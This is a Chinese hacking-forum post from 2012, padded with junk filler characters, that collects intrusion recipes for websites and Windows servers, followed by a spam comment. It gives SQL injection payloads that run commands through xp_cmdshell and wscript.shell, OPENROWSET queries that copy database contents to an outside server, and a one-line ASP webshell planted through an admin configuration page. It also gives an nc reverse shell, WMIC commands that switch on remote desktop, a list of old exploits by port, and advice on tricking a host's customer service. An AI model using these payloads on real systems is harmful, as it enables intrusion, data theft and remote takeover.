中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]
作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关
  q- E* {- F6 N! i( L& i
+ W4 b: y' u, ]0 n# z. }- Y; g% a) s( ?' B' w1 L0 X
SA点数据库分离搞法+语句:' m! @7 A2 z. `' U* a0 R9 s

/ |4 t% o/ o4 k1 _注射点不显错,执行下面三条语句页面都返回正常。* M0 o6 c. [' ^! Y
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')% D2 N3 F( Z- Q. F! ?5 y3 V9 |8 O
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')/ c$ `" N( }" u/ [( K7 |* }9 ~
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')8 f8 l  y5 w$ w8 L( E+ O+ B
可以列目录,判断系统为2000,web与数据库分离
$ @1 l& H& Y6 E遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
( z' a& x3 z# \$ ]' `" r在注射点上执行' \! n5 f& X2 }% C2 m  B) T. E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
' }0 D* k; e9 a- b( H4 \* s& J页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
9 _5 \. u& [; Y还有我用NC监听得其他端口都没有得到IP。
2 {# k! m% h9 B- r. K' F2 F; H( H3 i) N$ ^2 y
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) X' o, W3 w/ ~1 ]! q1 q
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--* O  _! I: Y2 }, L

' h0 [5 n. r8 ]$ m/ m) @$ t6 h  |;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
: c  g: a# J2 G+ _& Y
1 @+ X$ B7 f# w4 h现在就猜想是不是数据库是内网而且不能连外网。0 S, k" ?: ~; X1 p% @& e  n

' [6 c! l8 v* n
7 q# v7 V5 c6 n' k1 y% J2 E0 Gaccess导出txt文本代码7 w' h! P- J' ?8 P, n
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin' g8 l8 j; z$ q+ X" W% O
- ^+ C: y2 v+ e! e
! x8 @/ d7 X* k% N5 ~& b
/ ~( @+ G( T3 p& H, i, Q9 K- f
自动跳转到指定网站代码头
" D8 X3 h- K' d6 L<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>) L8 R) }  u6 b6 z# a

2 M4 ^" z8 V* i* t0 s. V; W
  H7 o2 f- n9 n8 K: _( t; Z. y: z入侵java or jsp站点时默认配置文件路径:
7 o/ {6 O4 G  M' b8 k) l; i) V\web-inf\web.xml
3 J8 ^4 _- `! A+ `! h, W5 Qtomcat下的配置文件位置:
' C+ O1 ?- h& b\conf\server.xml            (前面加上tomcat路径)
0 _7 l: v! d& c3 z2 [5 S\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
8 n4 I0 W6 Z3 e: M+ m+ W
( h5 U% {" r0 U. S, v' V8 w( ]$ r' ~1 G: k3 f, R$ ^; D
3 e/ ^- b: k9 d+ ]( S
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:+ V4 Q* [0 B0 v2 L
-1%23
' S& V0 M* R- o; X# p> , ]" a" F3 ], j" r4 [
<
1 U% u3 z, q$ ^1 w3 m1'+or+'1'='1
( L% c5 q$ V' x3 ~! c/ rid=8%bf
( c! c8 ]$ a( |, A* `5 z& q) z% E& o- q. E6 _' Q' i" J
全新注入点检测试法:8 m( _* C6 I% p' [* a
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
& G3 H6 a7 V" P) Y# h
. W7 B1 ?3 C% {  N, |在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。* Y+ k+ [6 D4 D% I) {  B1 ~

/ l3 J* e: @, E1 }0 v$ ?1 G搜索型注入判断方法:
  d" o% E8 [4 `* y4 j北京%' and '1'='1' and '%'='/ o  I0 r' p8 E+ N! c
北京%' and '1'='2' and '%'='  t7 m; \  ~9 f  e
- z/ c- N& n& K, [4 o% h9 J
# {6 |- S" P' k9 D. o- o
COOKIES注入:6 b# |# w0 _& m8 U4 o
2 Z) ?; b2 h' A1 {2 j, p7 X
javascript:alert(document.cookie="id="+escape("51 and 1=1"));, X( \* z; C- f: r
. i0 |3 r7 [' U& o8 y+ X
2000专业版查看本地登录用户命令:8 N8 \5 m1 x0 ?, \4 m- i
net config workstation
0 M' k& k% ]7 [) i
7 P$ P# M: c6 ~6 {; P" z0 q4 ?: M- V6 F: I% G0 x$ W5 V' T
2003下查看ipsec配置和默认防火墙配置命令:, k$ L& l  f# l5 Z, k
netsh firewall show config0 Q/ N" e+ o6 z* s
netsh ipsec static show all
, d9 Q6 S& q  |' @: L
/ s* [1 r( U. r6 o; j# P4 N9 [不指派指定策略命令:
% x+ J- ?$ k$ G# T4 D2 cnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
- k! L8 |* Y9 X8 Unetsh ipsec static show policy all  显示策略名
5 i; z2 p5 C* `* A) Z6 Z, ?, W
& V8 b& D: |9 c/ t1 W! j1 i$ {
猜管理员后台小技巧:
) C- c, E" [5 L6 padmin/left.asp . E# U" y8 H5 ^8 |: e  n/ ?, i
admin/main.asp$ T2 o' g% V; t- C5 K2 [4 ?
admin/top.asp4 f2 z9 H5 Y$ J$ _
admin/admin.asp
& G2 }' `; s0 }4 x会现出菜单导航,然后迅雷下载全部链接
6 G7 ~) Z( Y* ^# T
# U2 @+ Q4 L7 k6 I$ j7 |
# @5 \7 q# ]+ U" y4 s社会工程学:7 L2 h$ k7 o9 a1 E8 q) r
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
$ L) v3 H% u7 S+ O$ ^& h6 ]然后去骗客服' F/ c/ Q" n: h" R
/ H4 O2 B- Q+ i

2 c0 z2 N: t. f/ U: h) P+ ^* {统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
! @4 W- Z5 s3 u查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, . J7 Y* N# H6 i( ]
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。# l+ ~2 ^/ V* [' W+ ]
5 A* @# H- c5 ^$ t/ z- I, f: y
- B" w8 [  i- {. g2 U
) j+ X5 P; b  C* D
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
" z& \8 g( e4 l. a8 r
4 L, u9 T% j  M& ]# |3 C) |1 Q1 o% b* N) T3 \

. U0 X7 x' b: I0 a" b+ CCMD加密注册表位置5 k$ ~, k* u& e0 u% J, O6 g
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
% d$ x* l4 G( D/ v" h4 r$ DAutoRun
& Q% D" L9 S3 J7 K" a4 I8 Q  W
* a, @) H& X* A2 y(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor9 }- Z: }1 h8 l' o- U
AutoRun4 ]3 C, m  h+ b" k9 C, T
$ h8 o7 Q: K, w' F, P  G

9 K$ w9 X, ~2 P8 f4 K3 z! H& o在找注入时搜索Hidden,把他改成test. o6 M  _5 L  v
1 L+ Z9 S3 P" D& c7 ~8 L( M
8 R( E& R  c9 @$ c: ^' V9 y6 o
9 d0 }, N! D0 |4 q. y% T; K
mstsc /v:IP /console / j( u" _8 K6 W! [

/ T* @+ K4 b% @. r
) ~% F5 W0 m) w0 |% J. p  t一句话开3389:" r* z; N: w! X$ ^8 v1 ~
: E- i% S) a7 b0 Z% M
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
  T6 ~9 u: {. v* Z4 U/ t开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
$ G' q% |. x2 }. u9 K3 Z5 w$ T( \4 H4 U0 s. ~# s, k
) v7 q; Q/ Q8 `" v
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
3 T. m0 K/ O8 JInsert into admin(user,pwd) values('test','test')
5 D, l- s  ^0 b
% q, }9 t) P8 s9 F, I3 q. P6 v1 `2 k+ \
NC反弹
4 \7 ]: \& U) q/ h3 s; R1 j# d先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   ' l. r+ f- {8 y
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
' i" Z7 M3 Q2 w$ |  t
; \4 L1 Q0 P& ]6 V6 v; J$ w& e9 b6 I3 g/ t
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
1 U' }; a! n: N+ i2 `% R  }- ]5 ^0 U' {5 E, w7 H4 X6 w1 D( z
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录& v* Q2 d" U1 m& o6 ^2 M2 F1 k
例如:2 B$ o* b! u1 j3 R
subst k: d:\www\ 用d盘www目录替代k盘
& ^4 o9 w$ J* x6 ?6 w1 ~- _0 Zsubst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2